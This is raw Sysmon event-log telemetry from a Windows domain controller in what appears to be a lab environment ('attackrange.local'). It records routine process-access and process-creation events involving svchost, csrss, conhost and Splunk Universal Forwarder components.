10341000x80000000000000009106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.004{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.895{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:01.909{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1e